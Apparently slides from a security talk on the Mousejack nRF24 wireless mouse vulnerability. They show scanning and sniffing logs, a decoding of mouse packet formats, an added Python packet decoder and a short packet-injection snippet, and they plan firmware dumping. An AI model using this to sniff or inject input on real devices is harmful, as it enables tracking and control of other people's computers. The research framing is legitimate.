Just (Mouse)jackin’ It
Exploring Mousejack & other nRF24x adventures
Part 1:
Research & Review of Prior Work
Mousejack ... tl;dr
● https://www.bastille.net/technical-details
● Lots of wireless keyboards and mice use nRF24x chipsets
● Mice – unencrypted.
– Inject mouse events.
● Blind, open-loop on-screen keyboard navigation anyone?
– Can we glean info from tracking mouse movement?
● Keyboards – encrypted… but...
– Some receivers accept unencrypted keystroke messages…
– … from mice with identity crises
● Forced pairing
– Because convenience?
Vendor Responses
o_O
Vendor Responses
“Dell has been working with Bastille Research on their latest findings regarding
the vulnerabilities identified in Wireless Keyboard Mouse bundle KM632 &
KM714.
Customer security is a top concern and priority for Dell and we will work with
our customers directly to resolve potential vulnerabilities like this. If you are using
the affected models, or question whether you are using an affected model, Dell
recommends that you reach out to our Technical support contacts specific to your
country as listed here.
Dell Technical Support will assist the customer in addressing the
vulnerability, including identifying a suitable Dell replacement if appropriate.
In the meantime, customers can largely contain this vulnerability by
activating the Operating System’s lock screen when not using the system.
Dell would like to thank ‘Bastille Research’ and those in the security community
whose efforts help us protect customers through
coordinated vulnerability disclosure.”
February 23rd, 2016.
Teach Me How to Dougie
● https://www.bitcraze.io/crazyradio-pa
● https://github.com/RFStorm/mousejack
– nRF24LU1 firmware
– Sniffing & Enumeration scripts
– PoC Exploit code is not published
● Speculation: Ethical or legal dilemma for the researchers?
● Plenty of information in advisory and prior work slides
– We’re big kids, we can figure things out ourselves, right? :)
Teach Me How to Dougie
● Step 1: Scan for devices
$ ./nrf24-scanner -l
[2016-06-03 01:22:28.768] 62 0 EA:EA:9C:34:07
[2016-06-03 01:22:38.107] 71 10 EA:EA:9C:34:07 00:C2:00:00:ED:CF:FF:00:00:83
[2016-06-03 01:22:38.123] 71 10 EA:EA:9C:34:07 00:C2:00:00:EB:DF:FF:00:00:75
[2016-06-03 01:22:38.148] 71 0 EA:EA:9C:34:07
[2016-06-03 01:22:38.179] 71 0 EA:EA:9C:34:07
[2016-06-03 01:22:46.561] 71 0 EA:EA:9C:34:07
[2016-06-03 01:22:46.569] 71 10 EA:EA:9C:34:07 00:C2:00:00:03:00:00:00:00:3B
[2016-06-03 01:22:54.529] 66 0 EA:EA:9C:34:07
[2016-06-03 01:23:02.646] 62 0 EA:EA:9C:34:07
[2016-06-03 01:23:02.662] 62 5 EA:EA:9C:34:07 00:40:00:6E:52
[2016-06-03 01:23:11.084] 62 0 EA:EA:9C:34:07
[2016-06-03 01:23:11.090] 62 10 EA:EA:9C:34:07 00:C2:00:00:FE:1F:00:00:00:21
[2016-06-03 01:23:11.137] 62 0 EA:EA:9C:34:07
[2016-06-03 01:23:11.145] 62 10 EA:EA:9C:34:07 00:C2:00:00:FC:4F:00:00:00:F3
Teach Me How to Dougie
● Step 2: Sniff traffic
$ ./nrf24-sniffer.py -l -a EA:EA:9C:34:07
[2016-06-03 01:24:38.249] 71 5 EA:EA:9C:34:07 00:40:00:6E:52
[2016-06-03 01:24:38.306] 71 10 EA:EA:9C:34:07 00:C2:00:00:01:F0:FF:00:00:4E
[2016-06-03 01:24:38.313] 71 10 EA:EA:9C:34:07 00:C2:00:00:01:E0:FF:00:00:5E
[2016-06-03 01:24:38.321] 71 10 EA:EA:9C:34:07 00:C2:00:00:01:E0:FF:00:00:5E
[2016-06-03 01:24:38.327] 71 10 EA:EA:9C:34:07 00:4F:00:00:6E:E0:FF:00:00:64
[2016-06-03 01:24:38.335] 71 10 EA:EA:9C:34:07 00:C2:00:00:01:00:00:00:00:3D
[2016-06-03 01:24:38.343] 71 10 EA:EA:9C:34:07 00:C2:00:00:00:F0:FF:00:00:4F
[2016-06-03 01:24:38.351] 71 10 EA:EA:9C:34:07 00:4F:00:00:6E:F0:FF:00:00:54
[2016-06-03 01:24:38.452] 71 5 EA:EA:9C:34:07 00:40:00:6E:52
[2016-06-03 01:24:38.454] 71 5 EA:EA:9C:34:07 00:40:00:6E:52
[2016-06-03 01:24:38.554] 71 5 EA:EA:9C:34:07 00:40:00:6E:52
[2016-06-03 01:24:38.656] 71 10 EA:EA:9C:34:07 00:C2:01:00:00:00:00:00:00:3D
[2016-06-03 01:24:38.664] 71 10 EA:EA:9C:34:07 00:4F:00:00:6E:00:00:00:00:43
[2016-06-03 01:24:38.672] 71 5 EA:EA:9C:34:07 00:40:00:6E:52
[2016-06-03 01:24:38.766] 71 5 EA:EA:9C:34:07 00:40:00:6E:52
[2016-06-03 01:24:38.773] 71 10 EA:EA:9C:34:07 00:C2:00:00:00:00:00:00:00:3E
[2016-06-03 01:24:38.781] 71 10 EA:EA:9C:34:07 00:4F:00:00:6E:00:00:00:00:43
[2016-06-03 01:24:38.883] 71 5 EA:EA:9C:34:07 00:40:00:6E:52
Teach Me How to Dougie
● Step 2a: Decode…
– Active heartbeat:
00:40:00:6E:52
– Active → Idle:
00:4F:00:04:B0:F0:FF:00:00:0E
– Idle heartbeat:
00:40:04:B0:0C
– Left press:
00:C2:01:00:00:00:00:00:00:3D
– Right press:
00:C2:02:00:00:00:00:00:00:3C
– Middle press:
00:C2:04:00:00:00:00:00:00:3A
– Release:
00:C2:00:00:00:00:00:00:00:3E
– Movement:
00:C2:00:00:FE:AF:FF:00:00:92
00:C2:00:00:FF:6F:00:00:00:D0
00:C2:00:00:EE:0F:00:00:00:41
00:C2:00:00:07:E0:FF:00:00:58
Teach Me How to Dougie
● Step 2a: Decode…
– Last byte is checksum
● Checksum = -(sum(payload))
– That’s a two’s complement negation, not bitwise
– Byte two is button press mask:
● [0]: Left button
● [1]: Right button
● [2]: Scroll wheel button
● [3]: Side button (back)
● [4]: Side button (forward)
● [5]: Thumb button
– Press sets bit, release clears it
Teach Me How to Dougie
● Step 2a: Decode…
– Relative movement in bytes 4 through 6.
● Two’s complement, 12-bit value.
● X = sign_extend([4] | (([5] & 0x0f) << 8))
● Y = sign_extend((([5] & 0xf0) >> 4) | ([6] << 4))
Teach Me How to Dougie
● Demo:
– Decode packets piped from nrf24-sniffer.py
– Animate/plot mouse movement and button press
locations using Turtle [1]. (Live or pre-recorded)
[1] https://docs.python.org/2/library/turtle.html
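The decode rules from Step 2a and the "decode packets piped from nrf24-sniffer.py, then plot them" demo, carried through as one runnable Python script. This is an added example written for these slides; it is not code from the deck or from the RFStorm mousejack tools. It assumes the sniffer line layout shown in Step 2 ("[timestamp] channel length address [payload]"), and the meaning it assigns to byte 1 (0x40 heartbeat, 0x4F state change, 0xC2 mouse report) is inferred from the labelled captures above, not from any vendor documentation. The checksum and the 12-bit X/Y extraction are exactly the slide's formulas, with the checksum verified before a payload is trusted.

```python
"""Decode nrf24-sniffer.py lines and the mouse payloads from Steps 2 and 2a.
Added example, not part of the slides or the RFStorm mousejack tools. Assumes the
log layout "[timestamp] channel length address [payload]" shown above; the byte-1
kinds (0x40 heartbeat, 0x4F state change, 0xC2 report) are inferred from the
labelled captures on the slides, not from vendor documentation."""
import re

# Button mask bits in byte 2, in the order listed on the slide.
BUTTON_NAMES = ("left", "right", "wheel", "back", "forward", "thumb")

# [timestamp] channel length 5-byte-address [colon-separated payload]
LINE_RE = re.compile(
    r"^\[(?P<ts>[^\]]+)\]\s+(?P<channel>\d+)\s+(?P<length>\d+)\s+"
    r"(?P<addr>(?:[0-9A-Fa-f]{2}:){4}[0-9A-Fa-f]{2})"
    r"(?:\s+(?P<payload>[0-9A-Fa-f]{2}(?::[0-9A-Fa-f]{2})*))?\s*$")

def from_colon_hex(text):
    """Turn '00:C2:01' into the corresponding bytes."""
    return bytes.fromhex(text.replace(":", ""))

def checksum(body):
    """Last byte = two's-complement negation of the sum of the preceding bytes."""
    return (-sum(body)) & 0xFF

def has_valid_checksum(payload):
    return len(payload) >= 2 and checksum(payload[:-1]) == payload[-1]

def sign_extend_12(value):
    """Interpret a 12-bit field as a signed two's-complement number."""
    value &= 0xFFF
    return value - 0x1000 if value & 0x800 else value

def decode_payload(payload):
    """Describe one payload as a dict; raise ValueError on a bad checksum."""
    if not payload:
        return {"type": "ack"}  # zero-length frames carry no payload at all
    if not has_valid_checksum(payload):
        raise ValueError("bad checksum in %s" % payload.hex())
    kind = payload[1]
    if kind == 0xC2 and len(payload) == 10:
        mask = payload[2]
        buttons = [n for bit, n in enumerate(BUTTON_NAMES) if mask & (1 << bit)]
        # X = byte 4 + low nibble of byte 5; Y = high nibble of byte 5 + byte 6.
        x = sign_extend_12(payload[4] | ((payload[5] & 0x0F) << 8))
        y = sign_extend_12(((payload[5] & 0xF0) >> 4) | (payload[6] << 4))
        return {"type": "report", "buttons": buttons, "x": x, "y": y}
    if kind == 0x40:
        return {"type": "heartbeat"}
    if kind == 0x4F:
        return {"type": "state_change"}
    return {"type": "unknown", "raw": payload.hex()}

def parse_line(line):
    """Split one sniffer line into fields; None if it is not a capture line."""
    m = LINE_RE.match(line)
    if not m:
        return None
    payload = from_colon_hex(m["payload"]) if m["payload"] else b""
    if len(payload) != int(m["length"]):
        raise ValueError("length field disagrees with payload: %r" % line)
    return {"channel": int(m["channel"]), "address": m["addr"], "payload": payload}

def decode_log(text):
    """Decode every capture line; returns a list of (channel, decoded) pairs."""
    out = []
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is not None:
            out.append((rec["channel"], decode_payload(rec["payload"])))
    return out

def track(decoded):
    """Sum relative moves into positions, as the Turtle demo does. Returns
    (path, presses): position after each report, and where each button went down."""
    x = y = 0
    path, presses, down = [], [], set()
    for _, ev in decoded:
        if ev["type"] != "report":
            continue
        x, y = x + ev["x"], y + ev["y"]
        path.append((x, y))
        for name in set(ev["buttons"]) - down:  # newly pressed this report
            presses.append((name, x, y))
        down = set(ev["buttons"])
    return path, presses

# Constructed sample in the format of the Step 2 capture above.
SAMPLE_LOG = """\
[2016-06-03 01:24:38.249] 71 5 EA:EA:9C:34:07 00:40:00:6E:52
[2016-06-03 01:24:38.306] 71 10 EA:EA:9C:34:07 00:C2:00:00:FE:AF:FF:00:00:92
[2016-06-03 01:24:38.313] 71 10 EA:EA:9C:34:07 00:C2:00:00:07:E0:FF:00:00:58
[2016-06-03 01:24:38.656] 71 10 EA:EA:9C:34:07 00:C2:01:00:00:00:00:00:00:3D
[2016-06-03 01:24:38.773] 71 10 EA:EA:9C:34:07 00:C2:00:00:00:00:00:00:00:3E
[2016-06-03 01:24:38.883] 71 0 EA:EA:9C:34:07
"""

if __name__ == "__main__":
    events = decode_log(SAMPLE_LOG)
    for channel, event in events:
        print(channel, event)
    print(track(events))
```

Pipe a live capture in with `python3 decode.py < capture.txt` after swapping `SAMPLE_LOG` for `sys.stdin.read()`; the `track()` output is the list of points a Turtle (or any plotter) would draw. Note that the Y expression parenthesises the nibble shift explicitly: written as `[5] & 0xf0 >> 4`, Python and C both evaluate the shift first and silently pick the wrong nibble, which the sample's (-2, -6) move exposes.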
Teach Me How to Dougie
● Step 2b:
– Generate or replay packets as needed
to drive your coworkers insane.
# Put the radio in sniffer mode (ESB w/o auto ACKs)
common.radio.enter_sniffer_mode(address)
common.radio.set_channel(common.channels[0])
common.radio.transmit_payload(payload)
Teach Me How to Dougie
● Step 3: Probe “network” - Who else is home?
$ ./nrf24-network-mapper.py -l -a EA:EA:9C:34:07
[2016-06-03 02:06:06.399] Trying address EA:EA:9C:34:00
[2016-06-03 02:06:06.510] Successful ping of EA:EA:9C:34:00 on channel 17
[2016-06-03 02:06:06.612] Successful ping of EA:EA:9C:34:00 on channel 32
[2016-06-03 02:06:06.966] Trying address EA:EA:9C:34:01
[2016-06-03 02:06:07.539] Trying address EA:EA:9C:34:02
[2016-06-03 02:06:07.754] Successful ping of EA:EA:9C:34:02 on channel 32
[2016-06-03 02:06:08.107] Trying address EA:EA:9C:34:03
[2016-06-03 02:06:08.677] Trying address EA:EA:9C:34:04
[2016-06-03 02:06:09.250] Trying address EA:EA:9C:34:05
[2016-06-03 02:06:09.823] Trying address EA:EA:9C:34:06
[2016-06-03 02:06:10.395] Trying address EA:EA:9C:34:07
[2016-06-03 02:06:10.485] Successful ping of EA:EA:9C:34:07 on channel 14
[2016-06-03 02:06:10.967] Trying address EA:EA:9C:34:08
[2016-06-03 02:06:11.540] Trying address EA:EA:9C:34:09
[2016-06-03 02:06:12.111] Trying address EA:EA:9C:34:0A
Teach Me How to Dougie
● Step 4: Go reverse engineer and exploit
the target device(s)
A Mouse
● Who cares? Pointless to bother with?
– Subtle jiggler – keep those nasty screensavers off
– Blind, open loop attacks possible?
– Modified firmware:
Surreptitious comms & data exfiltration?
A Keyboard
● -EAGAIN
– Have not reproduced keystroke injection yet
– Currently distracted by nRF24 datasheets & SDK…
– TODO: fuzzing strategy presented in the advisory:
● Monitor EV_KEY events from /dev/inputX node
via evtest
● TX payload, check for event(s), verify successes,
rinse and repeat
SPI programming interface
“Old news, why bother?”
● Some vendors are releasing patches
– What subset of users will bother to apply patch?
● Are there more opportunities for shenanigans?
– What does the nRF24 SDK provide?
● i.e., what code are we likely to find that’s been copied
wholesale into firmware?
– What other devices can I find using these parts?
nRF24L01+
● Low cost, single-chip 2.4 GHz transceiver
● GFSK modulation, 1 or 2 Mbps
● “Enhanced ShockBurst”
– Automatic packet handling (e.g., validation, ACK, retries)
– Built-in FIFOs
– “Multiceiver” (6 separate RX data pipes)
● SPI interface for control and data
● 2011: Promiscuous mode hack to sniff keyboard [1]
– <3 Travis Goodspeed
[1] https://travisgoodspeed.blogspot.com/2011/02/promiscuity-is-nrf24l01s-duty.html
nRF24LU1+
● Single chip solution:
– nRF24L01+ transceiver
– 8051 microcontroller
● USB interface
● Flash memory
– AES co-processor
● Mention of “True RNG?”
Note: nRF24LE1+ is similar, minus USB and full AES co-processor
(Galois multipliers only?)
Can we abuse automagic features?
● Lots of nice features to ensure devs only see
“valid” packets.
– What assumptions will developers make that we
can prove incorrect?
– Can we control packet drop?
– Can we bend RX state machines to our whim?
● Prior work on “packet in packet” attacks relevant?
Can we abuse automagic features?
● Spoof messages with PID + n, PID + (n+1)
Possible to dump firmware?
Only if protections weren’t enabled.
Possible to dump firmware?
Only if protections weren’t enabled.
:(
nRF24 SDK
● Provides “Gazelle” Link Layer & examples
– Star network with 6 nodes (Host & device roles)
– Frequency Hopping
– AES encryption
– Pairing example:
I wonder if any devs said...
“This pairing example works out of the box. SHIPPIT!”
nRF24 SDK
● Provides AES encryption examples
– Supports:
● ECB, CBC, CFB, OFB, CTR
● RNG passes “thermal noise” through “digital corrector” to
yield 8-bit readout.
– I’ll get back to you with FIPS 140-1 test results...
nRF24 SDK: AES Lib
NRF24 SDK: hal_aes
Where’s the Beef?
Tune in next time...
● Work with & disassemble SDK examples
● Implement fuzzing scripts
● Try to dump firmware/data from devices
– Eliminate or bound fuzzing
– Key hunting
– Do we see good amounts of SDK code re-use?
● How are the “exercises left to reader” implemented?
● Bring out your keyboards and mice.
